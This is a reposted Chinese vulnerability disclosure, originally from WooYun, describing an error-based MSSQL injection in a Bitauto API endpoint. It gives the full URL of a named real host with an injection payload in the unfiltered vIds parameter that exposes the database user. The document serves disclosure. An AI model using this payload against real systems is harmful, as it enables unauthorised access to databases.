神刀安全网

易车网某处MsSql报错注入

简要描述:

看完直播,出来捡了个sql注入,嘿嘿,貌似不是非主流站点

详细说明:

1:缺陷url

code 区域
http://api.admin.bitauto.com/videoforum/Promotion/GetVideoByVideoIds?callback=jQuery18002337399877142161_1421239616342&vfIds=32231&vIds=363830%2C363177%2C363802%2C362305%2C362718) and (user>0&_=1421241767005

2:貌似vfids整形给转换了,但是后面的vids没有过滤滴

3:输入个单引号

易车网某处MsSql报错注入

4:报错注个用户

易车网某处MsSql报错注入

漏洞证明:

3:输入个单引号

易车网某处MsSql报错注入

4:报错注个用户

易车网某处MsSql报错注入

修复方案:

过滤吧

版权声明:神刀安全网转自 MayIKissYou@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 易车网某处MsSql报错注入

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮